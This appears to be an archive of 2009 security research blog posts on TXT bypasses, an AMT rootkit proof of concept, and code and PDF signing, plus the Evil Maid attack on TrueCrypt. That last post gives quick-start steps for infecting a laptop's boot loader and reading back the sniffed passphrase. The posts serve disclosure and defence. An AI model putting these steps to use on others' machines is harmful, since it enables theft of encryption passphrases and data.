Monday, December 21, 2009

Another TXT Attack

Earlier this year our team has presented an attack against Intel TXT that exploited a design problem with SMM mode being over privileged on PC platforms and able to interfere with the SENTER instruction. The Intel response was two-fold: to patch the SMM implementation bugs we used for the attack (this patch was for both the NVACPI SMM attacks, as well as for the SMM caching attack), and also to start (intensify?) working on STM specification, that is, we heard, planned to be published sometime in the near future. STM is a thin hypervisor concept that is supposed to provide protection against (potentially) malicious SMMs.

Today we present a totally different attack that allows an attacker to trick the SENTER instruction into misconfiguring the VT-d engine, so that it doesn’t protect the newly loaded hypervisor or kernel. This attack exploits an implementation flaw in a SINIT AC module. This new attack also allows for full TXT circumvention, using a software-only attack. This attack doesn't require any SMM bugs to succeed and is totally independent from the previous one.

The press release is here.

The full paper is here.

The advisory published by Intel today can be found here.

Enjoy.

Friday, October 16, 2009

Evil Maid goes after TrueCrypt!

From time to time it’s good to take a break from all the ultra-low-level stuff, like e.g. chipset or TXT hacking, and do something simple, yet still important. Recently Alex Tereshkin and I got some spare time and we implemented the Evil Maid Attack against TrueCrypt system disk encryption in a form of a small bootable USB stick image that allows to perform the attack in an easy “plug-and-play” way. The whole infection process takes about 1 minute, and it’s well suited to be used by hotel maids.

The Attack
Let’s quickly recap the Evil Maid Attack. The scenario we consider is when somebody left an encrypted laptop e.g. in a hotel room. Let’s assume the laptop uses full disk encryption like e.g. this provided by TrueCrypt or PGP Whole Disk Encryption.

Many people believe, including some well known security experts, that it is advisable to fully power down your laptop when you use full disk encryption in order to prevent attacks via FireWire/PCMCIA or ”Coldboot” attacks.

So, let’s assume we have a reasonably paranoid user, that uses full disk encryption on his or her laptop, and also powers it down every time they leave it alone in a hotel room, or somewhere else.

Now, this is where our Evil Maid stick comes into play. All the attacker needs to do is to sneak into the user’s hotel room and boot the laptop from the Evil Maid USB Stick. After some 1-2 minutes, the target laptop’s gets infected with Evil Maid Sniffer that will record the disk encryption passphrase when the user enters it next time. As any smart user might have guessed already, this part is ideally suited to be performed by hotel maids, or people pretending to be them.

So, after our victim gets back to the hotel room and powers up his or her laptop, the passphrase will be recorded and e.g. stored somewhere on the disk, or maybe transmitted over the network (not implemented in current version).

Now we can safely steal/confiscate the user’s laptop, as we know how to decrypt it. End of story.

Quick Start
Download the USB image here. In order to “burn” the Evil Maid use the following commands on Linux (you need to be root to do dd):

dd if=evilmaidusb.img of=/dev/sdX

Where /dev/sdX should be replaced with the device representing your USB stick, e.g. /dev/sdb. Please be careful, as choosing a wrong device might result in damaging your hard disk or other media! Also, make sure to use the device representing the whole disk (e.g. /dev/sdb), rather than a disk partition (e.g. /dev/sdb1).

On Windows you would need to get a dd-like program, e.g. this one, and the command would look more or less like this one (depending on the actual dd implementation you use):

dd if=evilmaidusb.img of=\\?\Device\HarddiskX\Partition0 bs=1M

where HarddiskX should be replaced with the actual device the represents your stick.

After preparing the Evil Maid USB stick, you’re ready to test it against some TrueCrypt-encrypted laptop (more technically: a laptop that uses TrueCrypt system disk encryption). Just boot the laptop from the stick, confirm you want to run the tool (press ‘E’) and the TrueCrypt loader on your laptop should be infected.

Now, Evil Maid will be logging the passphrases provided during the boot time. To retrieve the recorded passphrase just boot again from the Evil Maid USB -- it should detect that the target is already infected and display the sniffed password.

The current implementation of Evil Maid always stores the last passphrase entered, assuming this is the correct one, in case the user entered the passphrase incorrectly at earlier attempts.

NOTE: It’s probably illegal to use Evil Maid to obtain password from other people without their consent. You should always obtain permission from other people before testing Evil Maid against their laptops!

CAUTION: The provided USB image and source code should be considered proof-of-concept only. Use this code at your own risk, and never run it against a production system. Invisible Things Lab cannot be held responsible for any potential damages this code or its derivates might cause.

How the Evil Maid USB works
The provided implementation is extremely simple. It first reads the first 63 sectors of the primary disk (/dev/sda) and checks (looking at the first sector) if the code there looks like a valid TrueCrypt loader. If it does, the rest of the code is unpacked (using gzip) and hooked. Evil Maid hooks the TC’s function that asks user for the passphrase, so that the hook records whatever passphrase is provided to this function. We also take care about adjusting some fields in the MBR, like the boot loader size and its checksum. After the hooking is done, the loader is packed again and written back to the disk.

You can get the source code for the Evil Maid infector here.

Possible Workarounds
So, how should we protect against such Evil Maid attacks? There are a few approaches...

1. Protect your laptop when you leave it alone
Several months ago I had a discussion with one of the TrueCrypt developers about possible means of preventing the Evil Maid Attack, perhaps using TPM (see below). Our dialog went like this (reproduced here with permission from the TrueCrypt developer):

TrueCrypt Developer: We generally disregard "janitor" attacks since they inherently make the machine untrusted. We never consider the feasibility of hardware attacks; we simply have to assume the worst. After an attacker has "worked" with your hardware, you have to stop using it for sensitive data. It is impossible for TPM to prevent hardware attacks (for example, using hardware key loggers, which are readily available to average Joe users in computer shops, etc.)

Joanna Rutkowska: And how can you determine that the attacker have or have not "worked" with your hardware? Do you carry your laptop with you all the time?

TrueCrypt Developer: Given the scope of our product, how the user ensures physical security is not our problem. Anyway, to answer your question (as a side note), you could use e.g. a proper safety case with a proper lock (or, when you cannot have it with you, store it in a good strongbox).

Joanna Rutkowska: If I could arrange for a proper lock or an impenetrable strongbox, then why in the world should I need encryption?

TrueCrypt Developer: Your question was: "And how can you determine that the attacker has or has not worked with your hardware?" My answer was a good safety case or strongbox with a good lock. If you use it, then you will notice that the attacker has accessed your notebook inside (as the case or strongbox will be damaged and it cannot be replaced because you had the correct key with you). If the safety case or strongbox can be opened without getting damaged & unusable, then it's not a good safety case or strongbox. ;-)

That's a fair point, but this means that for the security of our data we must relay on the infeasibility to open our strongbox lock in a "clean" way, i.e. without visually damaging it. Plus it means we need to carry a good strongbox with us to any travel we go. I think we need a better solution...

Note that TrueCrypt authors do mention the possibility of physical attacks in the documentation:
If an attacker can physically access the computer hardware and you use it after the attacker has physically accessed it, then TrueCrypt may become unable to secure data on the computer. This is because the attacker may modify the hardware or attach a malicious hardware component to it (such as a hardware keystroke logger) that will capture the password or encryption key (e.g. when you mount a TrueCrypt volume) or otherwise compromise the security of the computer.
However, they do not explicitly warn users of a possibility of something as simple and cheap as the Evil Maid Attack. Sure, they write "or otherwise compromise the security of the computer", which does indeed cover e.g. the Evil Maid Attack, but my bet is that very few users would realize what it really means. The examples of physical attacks given in the documentation, e.g. modifying the hardware or attaching a malicious hardware, is something that most users would disregard as too expensive an attack to be afraid of. But note that our Evil Maid attack is an example of a “physical” attack, that doesn’t require any hardware modification and is extremely cheap.

Of course it is a valid point, that if we allow a possibility of a physical attack, then the attacker can e.g. install a hardware keylogger. But doing that is really not so easy as we discuss in the next paragraph. On the other hand, spending two minutes to boot the machine from an Evil Maid USB stick is just trivial and is very cheap (the price of the USB stick, plus the tip for the maid).

2. The Trusted Computing Approach
As explained a few months ago on this blog, a reasonably good solution against Evil Maid attack seems to be to take advantage of either static or dynamic root of trust offered by TPM. The first approach (SRTM) is what has been implemented in Vista Bitlocker. However Bitlocker doesn’t try to authenticate to the user (e.g. via displaying a custom picture shot by the user, with the picture decrypted using a key unsealed from a TPM), so it’s still possible to create a similar attack against Bitlocker, but with a bit different user experience. Namely the Evil Maid for Bitlocker would have to display a fake Bitlocker prompt (that could be identical to the real Bitlocker prompt), but after obtaining a correct password from the user Evil Maid would not be able to pass the execution to the real Bitlocker code, as the SRTM chain will be broken. Instead, Evil Maid would have to pretend that the password was wrong, uninstall itself, and then reboot the platform. Thus, a Bitlocker user that is confident that he or she entered the correct password, but the OS didn’t boot correctly, should destroy the laptop.

The dynamic root of trust approach (DRTM) is possible thanks to Intel TXT technology, but currently there is no full disk encryption software that would make use of it. One can try to implement it using Intel’s tboot and some Linux disk encryption, e.g. LUKS.

Please also note that even if we assume somebody “cracked” the TPM chip (e.g. using an electron microscope, or NSA backdoor), that doesn’t mean this person can automatically get access to the encrypted disk contents. This is not the case, as the TPM is used only for ensuring trusted boot. After cracking the TPM, the attacker would still have to mount an Evil Maid attack in order to obtain the passphrase or key. Without TPM this attack is always possible.

Are those trusted computing-based approaches 100% foolproof? Of course not. As signalized in the previous paragraph, if an attacker was able to mount a hardware-based keylogger into your laptop (which is non-trivial, but possible), then the attacker would be able to capture your passphrase regardless of the trusted boot. A user can prevent such an attack by using two-factor authentication (RSA challenge-response implemented in a USB token) or e.g. one-time passwords, so that there is no benefit for the attacker to capture the keystrokes. But the attacker might go to the extreme and e.g. replace the DRAM, or even the CPU with malicious DRAM or CPU that would sniff and store the decryption key for later access. We’re talking here about attack that very few entities can probably afford (think NSA), but nevertheless they are theoretically possible. (Note that an attack with inserting a malicious PCI device that would try to sniff the key using DMA can be prevented using TXT+VT-d technology).

However, just because the NSA can theoretically replace your CPU with a malicious one, doesn’t mean TPM-based solutions are useless. As for the great majority of other people that do not happen to be on the Terrorist Top 10, these represent a reasonable solution that could prevent Evil Maid attacks, and, when combined with a proper two-factor authentication, also simple hardware based attacks, e.g. keylogger, cameras, remote keystroke sniffing using laser, etc. I really cannot think of a more reasonable solution here.

3. The Poor Man’s Solution
Personally I would love to see TrueCrypt implementing TPM-based trusted boot for its loader, but, well, what can I do? Keep bothering TrueCrypt developers with Evil Maid attacks and hope they will eventually consider implementing TPM support...

So, in the meantime we have come up with a temporary poor man’s solution that we use at our lab. We call it Disk Hasher. It’s a bootable Linux-based USB stick that can be configured in quite a flexible way to calculate hashes of selected disk sectors and partitions. The correct hashes are stored also on the stick (of course everything is encrypted with a custom laptop-specific passphrase). We use this stick to verify the unencrypted portions of our laptops (typically the first 63 sectors of sda, and also the whole /boot partition in case of Linux-based laptops where we use LUKS/dm-crypt).

Of course there are many problems with such a solution. E.g. somebody who can get access to my Disk Hasher USB (e.g. when I’m in a swimming pool), can infect it in such a way that it would report correct hashes, even though the disk of my laptop would be “evilmaided”...

Another problem with Disk Hasher solution is that it only looks at the disk, but cannot validate e.g. the BIOS. So if the attacker found a way to bypass the BIOS reflashing protection on my laptop, then he or she can install a rootkit there that would sniff my passphrase or the decryption key (in case I used one time passwords).

Nevertheless, our Disk Hasher stick seems like a reasonable solution and we use it often internally at ITL to validate our laptops. In fact this is the most we can do, if we want to use TrueCrypt, PGP WDE, or LUKS/dm-crypt.

FAQ

Q: Is this Evil Maid Attack some l33t new h4ck?
Nope, the concept behind the Evil Maid Attack is neither new, nor l33t in any way.

Q: So, why did you write it?
Because we believe it demonstrates an important problem, and we would like more attention to be paid in the industry to solving it.

Q: I’m using two-factor authentication, am I protected against EM?
While a two-factor authentication or one time passwords are generally a good idea (e.g. they can prevent various keylogger attacks), they alone do not provide protection from Evil Maid-like attacks, because the attacker might modify his or her sniffer to look for the final decryption key (that would be calculated after the 2-factor authentication completes).

Q: How is Evil Maid different from Stoned-Bootkit?
The Stoned Bootkit, released a few months ago by an individual describing himself as “Software Dev. Guru in Vienna”, is also claimed to be capable of "bypassing TrueCrypt", which we take to mean a capability to sniff TC's passphrases or keys. Still, the biggest difference between Stoned Bootkit and Evil Maid USB is that in case of our attack you don’t need to start the victim's OS in order to install Evil Maid, all you need to do is to boot from a USB stick, wait about 1 minute for the minimal Linux to start, and then press ‘E’, wait some 2 more seconds, and you’re done. With the Stoned Bootkit, according to the author’s description, you need to get admin access to the target OS in order to install it, so you either need to know the Windows admin password first, or use some exploit to get the installer executing on the target OS. Alternatively, you can install it from a bootable Windows CD, but this, according to the author, works only against unencrypted volumes, so no use in case of TrueCrypt compromise.

Q: I've disabled boot from USB in BIOS and my BIOS is password protected, am I protected against EM?
No. Taking out your HDD, hooking it up to a USB enclosure case and later installing it back to your laptop increases the attack time by some 5-15 minutes at most. A maid has to carry her own laptop to do this though.

Q: What about using a HDD with built-in hardware-based encryption?
We haven’t tested such encryption systems, so we don’t know. There are many open questions here: how is the passphrase obtained from the user? Using software stored on the disk or in the BIOS? If on the disk, is this portion of disk made read-only? If so, does it mean it is non-updatable? Even if it is truly read-only, if the attacker can reflash the BIOS, then he or she can install a passphrase sniffer there in the BIOS. Of course that would make the attack non-trivial and much more expensive than the original Evil Maid USB we presented here.

Q: Which TrueCrypt versions are supported by the current Evil Maid USB?
We have tested our Evil Maid USB against TrueCrypt versions 6.0a - 6.2a (the latest version currently available). Of course, if the “shape” of the TrueCrypt loader changed dramatically in the future, then Evil Maid USB would require updating.

Q: Why did you choose TrueCrypt and not some other product?
Because we believe TrueCrypt is a great product, we use it often in our lab, and we would love to see it getting some better protection against such attacks.

Q: Why there is no TPM support in TrueCrypt?
The TrueCrypt Foundation published official generalized response to TPM-related feature requests here.

Acknowledgments
Thanks to the ennead@truecrypt.org for all the polemics we had which allowed me to better gather my thoughts on the topic. The same thanks to Alex and Rafal, for all the polemics I have had with them (it's customary for ITL to spend a lot of time finding bugs in each other's reasoning).

Tuesday, September 22, 2009

Intel Security Summit: the slides

Last week I was invited to Hillsboro to speak at the Intel's internal conference on security. My presentation title was "A Quest To The Core: Thoughts on present and future attacks on system core technologies", and my goal was to somehow make a quick summary of the recent research our team has done over the last 12 months or so, and explain why we're so keen on hacking the low-level system components, while all the rest of the world is excited about browser and flash player bugs.

The slides (converted to PDF) can be found here. As you will see, I decided to remove most of the slides from the "Future" chapter. One reason for that was that we didn't want to hint Loic our competition as to some of our new toys we're working on;) The other reason was that, I think, the value of presenting only thoughts about attacks, i.e. unproven thoughts, or, should I even say, feelings about future attacks, has little research value, and while I can understand such information being important to Intel, I don't see how others could benefit from them.

I must say it was nice and interesting to meet in person with various Intel architects, i.e. the people that actually design and create our basic "universe" we all operate in. You can always change the OS (or even write your own!), but still you must stick to the rules, or "laws", of the platform (unless you can break them ;)

Wednesday, September 02, 2009

About Apple’s Security Foundations, Or Lack Of Thereof...

Every once in a while it’s healthy to reinstall your system... I know, I know, it’s almost a heresy to say that, but that’s reality in the world where our systems are totally unverifiable. In fact I don’t even attempt to verify if my Mac laptop has been compromised in any way (most system files are not signed anyway). But sometimes, you got this feeling that something might be wrong and you decide to reinstall to start your (digital) life all over again :)

So, every time I (re)install a Mac-based system, I end up cursing horribly at Apple’s architects. Why? Because in the Apple World they seem to totally ignore the concept of files integrity, to such extent that it’s virtually impossible to get any assurance that the programs I install are in any way authentic (i.e. not tampered by some 3rd party, e.g. by somebody controlling my Internet connection).

Take any Apple installer package, e.g. Thunderbird. In most cases an installer package on Mac is a .dmg file, that represents an installation disk image. Now, when you open such a file under Mac, the OS will never display any information about if this file is somehow signed (e.g. by who) or not. In fact, I’m pretty sure it’s never signed. What you end up with, is a .dmg file that you just downloaded over plaintext HTTP and you have absolutely no way of verifying if it is the original file the vendor really published. And you’re just about to grant admin privileges to the installer program that is inside this file -- after all it’s an installer, so must got root privileges, right (well, not quite maybe)? Beautiful...

Interestingly, this very same Thunderbird installer, but for Windows, is correctly signed, and Windows, correctly, displays that information (together with the ability to examine the certificate) and allows the user to make a choice of whether to allow it to run or not.



Sure, the certificate doesn’t guarantee that Mozilla didn’t put a nasty backdoor in there, nor that the file was not compromised due to Mozilla’s internal server compromise. Or that the certificate (the private key) wasn’t somehow stolen from Mozilla, or that the issuing authority didn’t make a mistake and maybe issued this certificate to some random guy, who just happened to be named Mozilla.

But the certificate provides liability. If it indeed turns out that this very Thunderbird installer was somehow malicious, I could take this signed file to the court and sue either Mozilla, or the certification authority for all the damages it might have done to me. Without the certificate I cannot do that, because I (and nobody) cannot know if the file was tampered while being downloaded (e.g. malicious ISP) or maybe because my system was already compromised.

But in case of Apple, we have no such choice -- we need to take the risk every time we download a program from the Internet. We must bet the security of our whole system, that at this very moment nobody is tampering with out (unsecured) HTTP connection, and also that nobody compromised the vendor’s Web Server, and, of course, we hope that the vendor didn’t put any malicious code into its product (as we could not sue them for it).

So that sucks. That sucks terribly! Without ability to check the integrity of programs we want to install, we cannot build any solid foundations. It’s funny how people divagate whether Apple implemented ASLR correctly in Snow Leopard, or not? Or whether NX is bypassable. It’s meaningless to dive into such advanced topics, if we cannot even assure that at the day 0 our system is clean. We need to start building our systems from the ground up, and not starting from the roof! Ability to assure the software we install is not tampered seems like a reasonable very first step. (Sure it could be compromised 5 minutes later, and to protect against this we should have other mechanisms, like e.g. mentioned above ASLR and NX).

And Apple should not blame the vendors for such a situation (“Vendors would never pay $300 for a certificate”, blah, blah), as it is just enough to have a look at the Windows versions of the same products, and that most of them do have signed installers (gee, even open-source TrueCrypt, has a signed installer for Windows!).

One should say that a few vendors, seeing this problem on Mac, do publish PGP signatures for their installation files. This includes e.g. PGP Desktop for Mac, KeePassX, TrueCrypt for Mac, and a few others. But these are just exceptions and I wonder how many users will be disciplined (and savvy) enough to correctly verify those PGP signatures (in general it requires you to download the vendor keys many months before, keep it in your ring, to minimize possibility that somebody alters both the installer files and the keys you download). Some other vendors offer pseudo-integrity by displaying MD5/SHA1 sums on their websites. That would make some sense only if the website on which the hashes are displayed was itself SSL-protected (still the file signature is a better option), as otherwise we can be sure that the attacker that is tampering with the installer file, will also take care about adjusting the hash on the website... But of course this never is the case -- have a look e.g. at the VMWare download page for the Mac Fusion (one need to register first). Very smart, VMWare! (Needles to say, the VMWare Workstation installer for Windows is properly signed).

BTW, anybody checked if the Apple updates are digitally signed somehow?

All I wrote here in this post is just trivial. It should be just obvious for every decently educated software engineer. Believe me it’s really is much more fun for me to write about things like new attacks on chipsets or virtualization. But I have this little hope that maybe somebody at Apple will read this little post and fix their OS. Because I really like Apple products for their aesthetics...

Wednesday, August 26, 2009

PDF signing and beyond

Today I got an advertising email from GlobalSign (where I previously bought a code signing certificate for Vista kernel drivers some years ago) highlighting their new (?) type of certificates for signing of Adobe PDF files. It made me curious, because, frankly, I've been recently more and more missing this feature. After a quick online research it turned out that this whole Adobe Certified Documents Services (CDS) seem to be nothing new, as apparently even Adobe Reader 6.0 had support for verifying those CDS certificates. The certificates are also available from other popular certification authorities like e.g. Entrust and Verisign, and a couple of others.

So, I immediately felt stupid that I haven't been aware of such a great feature, which apparently is out there for a few years now. Why I thought it was so great a feature? Consider the following scenario…

At our Invisible Things Lab resources page we offer a handful of files to download — slides and some proof of concept code. The website is served over a plaintext HTTP. This means that if you're downloading anything over a public WiFi (hotel, airport lounge, etc) you never know if the PDF you actually get has not been infected somewhere in the middle, e.g. by a guy in the lobby that is messing with the hotel WiFi.

So, one might argue that I should have paid a few hundred bucks and get an SSL certificate for my website and start serving it over HTTPS. But here's the problem — I, as zillions of other small businesses and individuals, host my website on some 5-dollar-a-month one-of-the-thousands hosting provider. I have zero knowledge about what people work there and if they can be trusted, and I also know nothing (and have zero impact) on how secure (or not, for that matter) the server is. (Same applies to my cell phone carrier, ISP, etc, BTW).

Now, the SSL certificate for the website "knows" nothing about how the files on my website should look like, in particular if they are compromised or not. All the SSL certificate does is to give assurance to the remote client that he or she downloaded the actual files that were on the server in the moment of downloading — whether they were the original ones authored by me, or perhaps maliciously modified by somebody who got access to the server.

So, the solution with an SSL certificate would work only if I trusted my web server, which could be assumed only if I run my own dedicated server. That, however, would be an overkill for a small company like ITL, especially that our business is not based on our web presence — in fact the website is maintained mainly for other researchers and students, who can easily download our papers and code from there, and also for the reporters so they can e.g. download a press release from there.

Surprisingly, the website has never been compromised, probably because it doesn't present an interesting target for any skilled person (or maybe exceptionally skilled people work at the hosting provider?). But I cannot know for sure, as I don't constantly monitor all the hashes of all the files, as this would require… well a dedicated server that would be running an SHA1 calculating script in a loop for 24/7 :)

Of course, zillions of other websites works this very same way and present the very same problems.

Now, ability to sign PDFs would be just a great solution here, because I could sign all those files with my certificate, and then all the people downloading stuff from ITL could know they are getting original PDFs that were created on one of the ITL members desktop computers, no matter how compromised the web server or the network connection is.

For the same reasons, I would welcome if others started doing the same, as currently I simply must assume every PDF I download from the net (and PDFs account for the majority of file downloads I do) to be potentially malicious. So, I always open them in my Red or Yellow VM (depending on the source of the download), and only if it "looks good" (very fuzzy term, I know), I might decide to move it to my host desktop (it's easier to work with PDFs on your host, and actually you should use your host desktop for something).

(Yes, I know, Kostya Kortchinsky, or Rafal, can sometimes escape from VMWare, but still I believe that today the best isolation I can get on a desktop, without sacrificing much convince, is via a type II hypervisor. It's horribly inelegant, but well, that's life).

So, I read some more about this Adobe CDS, being all excited about it, and ready to spend a few hundred euros on a certificate, only to realize that it doesn't look as good as I thought.

First disappointment comes from the fact that you must create a PDF using Adobe Acrobat software (not the Reader, but the commercial one). I've created all my PDFs using either Office (in the past) or iWork (today), and none of them seem to offer a way to digitally sign the PDF. I would like to get a simple tool, say pdfsign.exe, that I could use to sign any PDF I have, no matter how I generated it. Also, not surprisingly, the Mac native PDF viewer (Preview) doesn't seem to recognize the digital signature, and I bet some Linux PDF viewers do not as well.

Worst of all, even the Acrobat Reader 9, that I tested under Windows, and that correctly displayed all the CDS information, does one unbelievably stupid thing — it parses and renders the whole PDF before displaying the signature info. So, if you downloaded a malicious PDF, Acrobat Reader will happily open it and parse, without asking you a question of whether you would like to open it (as it is perhaps unsigned). At least I was unable to find an option that would force it to do that. So, if this PDF contained an exploit for the reader, it surely would get executed. Compare this with the (correct) behavior of Vista UAC where it presents the executable signature details before executing it.

You can see how your software works with Adobe PDF signatures, e.g. by looking at this exemplary file signed by GlobalSign.

So, Adobe CDS, in the form they are today, seem to be pretty useless, as far as protection from potentially malicious PDFs is considered (they surely have other positive applications, e.g. to certify about authenticity of e.g. a diploma).

But wouldn't it be great to have such a file signing mechanism globally adopted and not only for PDFs, but for any sort of files, including ZIPs, tgz's, heck, even plain text files? And have our main OSes generically recognize those signatures and display unified prompts of whether we want to allow an application to to open the file or not? Perhaps, in some situations, we could even define policies for specific applications. This seems easy to do from the technical point of view — we just need to "hook" (oh, God, did I say "hook"?) high-level OS API's like e.g. open() or CreateFile().

What about PGP and possibility of using this for signing any sort of files? Well, we use PGP a lot at ITL, but mainly for securing peer-to-peer communication (e.g. between us and our clients). There really is no good way to publish one's PGP key — the concept of Web of Trust might be good for some closed groups of people, but not for publishing files "to the world". And, of course, the first thing that an attacker who subverted PDFs on our website will do is to also subvert the PGP key displayed on the website. I also tried once to publish a PGP key to a key server, but got discouraged immediately after I noticed it didn't use SSL for submission. BTW, anybody knows if the key servers today use SSL? If not, how the trust is established? Maybe email clients, e.g. Thunderbird, come with built in PGP keys for select key servers?

So, I guess that was the main point of writing this post — to express how madly I would welcome a generic, OS-based, non-obligatory, signature verification for files, based on PKI :)

Ah, before a dozen of people jumps to the comment box to tell me that digital signatures do not assure non-maliciousness of anything — please don't do that, because I actually know that. In fact, it is not possible to assure non-maliciousness of pretty much anything, especially without strictly defining an ethical system we would like to use first. What the signatures provide is the liability, so that I know who to sue, in case my naked holiday pictures got leaked to the public because of some malicious PDF exploiting my system. In that case I can sue either the actual person who signed the PDF (if this person is identifiable) or the certification authority who issued the certificate to a wrong (unidentifiable) person.

Tuesday, August 25, 2009

Vegas Toys (Part I): The Ring -3 Tools

We've just published the proof of concept code for the Alex's and Rafal's "Ring -3 Rootkits" talk, presented last month at the Black Hat conference in Vegas. You can download the code from our website here. It's highly recommended that one (re)reads the slides before playing with the code.

In short, the code demonstrates injection of an arbitrary ARC4 code into a vPro-compatible chipset AMT/ME memory using the chipset memory reclaiming attack. Check the README and the slides for more information.


The actual ARC4 code we distribute here is very simple: it sets a DMA write transaction to the host memory every ca. 15 seconds in order to write the "ITL" string at the predefined physical addresses (increased by 4 with every iteration). Of course one can do DMA read as well.


The ability to do DMA from the ARC4 code to/from the host memory is, in fact, all that is necessary to write a sophisticated rootkit or any sort of malware, from funny jokers to sophisticated secret sniffers. Your imagination (and good pattern searching) is the only limit here.

The OS, nor any software running on the host OS, cannot access our rootkit code, unless, of course, it used the same remapping attack we used to insert our code there :) But the rootkit might even cut off this way by locking down the remapping registers, so fixing the vulnerability on the fly, after exploiting it (of course it would be insane for any AV to use our remapping attack in order to scan ME space, but just for completeness;)

An OS might attempt to protect itself from DMA accesses from the rootkit in the chipset by carefully setting VT-d protections. Xen 3.3/3.4, for example, sets VT-d protections in such a way that our rootkit cannot access the Xen hypervisor memory. We can, however, access all the other parts of the system which includes all the domains memory (i.e. where all the interesting data are located). Still, it should be possible to modify Xen so that it set VT-d mappings in such a strict way, that the AMT code (and the AMT rootkit) could not access any useful information in any of the domains. This, in fact, would be a good idea anyway, as it would also prevent any sort of hardware-based backdoors (except for the backdoors in the CPU).

An AMT rootkit can, however, get around such a savvy OS because it can modify the OS's VT-d initialization code before it sets the VT-d protections. Alternatively, if the protections are set before the rootkit was activated, the rootkit can force the system to reboot and boot it from the AMT Virtual CDROM (In fact AMT has been designed to be able to do exactly that), which would contain rootkit agent code that would modify the OS/VMM to-be-loaded image, so that it doesn't setup VT-d properly.

Of course, the proper solution against such an attack would be to use e.g. Intel TXT to assure trusted boot of the system. In theory this should work. In practice, as you might recall, we have already shown how to bypass Intel TXT. This TXT bypass attack still works on most (all?) hardware, as there is still no STM available in the wild (all that is needed for the attack is to have a working SMM attack, and last month we showed 2 such attacks — see the slides for the BIOS talk).

Intel has released a patch a day before our presentation at Black Hat. This is a cumulative patch that is also targeting a few other, unrelated, problems, like e.g. the SMM caching attack (also reported by Loic), the SMM nvacpi attack, and the Q45 BIOS reflashing attack (for which the code will be also published shortly).

Some of you might remember that Intel has patched this very remapping bug last year, after our Xen 0wning Trilogy presentations, where we used the very same bug to get around Xen hypervisor protections. However, Intel forgot about one small detail — namely it was perfectly possible for malware to downgrade BIOS to the previous, pre-Black-Hat-2008 version, without any user consent (after all this old BIO file was also digitally signed by Intel). So, with just one additional reboot (but without a user intervention needed) malware could still use the old remapping bug, this time to get access to the AMT memory. The recent patch mentioned above solves this problem by displaying a prompt during reflash boot, if reflashing to an older version of BIOS. So now it requires user intervention (a physical presence). This "downgrade protection" works, however, only if we have administrator password enabled in BIOS.

We could get into the AMT memory on Q35, however, even if the downgrade attack was not possible. In that case we could use our BIOS reflashing exploit (the other Black Hat presentation).

However, this situation looks differently on Intel latest Q45 chipsets (that also have AMT). As explained in the presentation, we were unable to get access to the AMT memory on those chipsets, even though we can reflash the BIOS there, and consequently, even though we can get rid of all the chipset locks (e.g. the remapping locks). Still, the remapping doesn't seem to work for this one memory range, where the AMT code resides.

This suggest Intel added some additional hardware to the Q45 chipset (and other Series 4 chipsets) to prevent this very type of attacks. But we're not giving up on Q45 yet, and we will be trying other attacks, as soon as we recover from the holiday laziness ;)

Finally, the nice picture of the Q35 chipset (MCH), where our rootkit lives :) The ARC4 processor is somewhere inside...

Thursday, July 30, 2009

Black Hat 2009 Slides

The wait is over. The slides are here. The press release is here. Unless you're a chipset/BIOS engineer kind of person, I strongly recommend reading the press release first, before opening the slides.

So, the "Ring -3 Rootkit" presentation is about vPro/AMT chipset compromises. The "Attacking Intel BIOS" presentation is about exploiting a heap overflow in BIOS environment in order to bypass reflashing protection, that otherwise allows only Intel-signed updates to be flashed.

We will publish the code some time after get back from Vegas.

Enjoy.

ps. Let me remind my dear readers that all the files hosted on the ITL website are not digitally signed and are served over a plaintext connection (HTTP). In addition, the ITL's website is hosted on a 3rd party provider's server, on which we have totally no control (which is the reason why we don't buy an SSL certificate for the website). Never trust unsigned files that you download from the Internet. ITL cannot be liable for any damages caused by the files downloaded from our website, unless they are digitally signed.

Friday, July 17, 2009

Interview

Alan Dang from Tom's Hardware did an interview with me. I talk there about quite a lot of things, many of which I would probably write about on this blog sooner or later (or already had), so I thought it might be of interest to the readers of this blog.

Friday, June 12, 2009

Virtualization (In)Security Training in Vegas

VM escapes, hypervisor compromises (via "classic" rootkits, as well as Bluepill-like rootkits), hypervisor protection strategies, SMM attacks, TXT bypassing, and more — these are some of the topics that will be covered by our brand new training on Virtualization (In)Security at the upcoming Black Hat USA.

The training offers quite a unique chance, I think, to absorb the results of 1+ year of the research done by our team within... just 2 days. This will be provided via detailed lectures and unique hands-on exercises.

Unlike our previous training on stealth malware (that will also be offered this year, BTW), this time we will offer attendees a bit of hope :) We will be stressing that some of the new hardware technologies (Intel TXT, VT, TPM), if used properly, have potential to dramatically increase security of our computer systems. Sure, we will be showing attacks against those technologies (e.g. TXT), but nevertheless we will be stressing that this is the proper way to go in the long run.

Interestingly, I'm not aware of any similar training of this kind, that would be covering the security issues related to virtualization systems and bare metal hypervisors. Hope we will not get into troubles with the Antitrust Commission for monopolizing this field ;)

The training brochure (something for your boss) is here.

The detailed agenda spanning 2 full days can be downloaded here.

The Black Hat signup page is here.

Tuesday, June 09, 2009

Quest to The Core

If you think SMM rootkits or PCI backdoors is low-level, then you should certainly see our talks in Vegas — ITL is going to define what does the "low-level" adjective really mean at the end of the decade ;)

In case you haven't noticed it at the Black Hat website yet — Alex and Rafal will be giving two presentations in Vegas:

1) Introducing Ring -3 Rootkits (description)

2) Attacking Intel® BIOS (description)

Let me stress that we have been in touch with Intel for quite some time about the above attacks, and that Intel is planning to release appropriate fixes a few weeks before our presentations at Black Hat.

There is more than just this coming at this year's Black Hat — most notably we will also be debuting with our Virtualization (In)Security Training. I will write a separate post about this training (containing a detailed agenda) in the coming days, so stay tuned.

Quite exciting.

Tuesday, June 02, 2009

More Thoughts on CPU backdoors

I've recently exchanged a few emails with Loic Duflot about CPU-based backdoors. It turned out that he recently wrote a paper about hypothetical CPU-backdoors and also implemented some proof-of-concept ones using QEMU (for he doesn't happen to own a private CPU production line). The paper can be bought here. (Loic is an academic, and so he must follow some of the strange customs in the academic world, one of them being that papers are not freely published, but rather being sold on a publisher website… Heck, even we, the ultimately commercialized researchers, still publish our papers and code for free).

Let me stress that what Loic writes about in the paper are only hypothetical backdoors, i.e. no actual backdoors have been found on any real CPU (ever, AFAIK!). What he does is he considers how Intel or AMD could implement a backdoor, and then he simulate this process by using QEMU and implementing those backdoors inside QEMU.

Loic also focuses on local privilege escalation backdoors only. You should however not underestimate a good local privilege escalation — such things could be used to break out of any virtual machine, like VMWare, or potentially even out of a software VMs like e.g. Java VM.

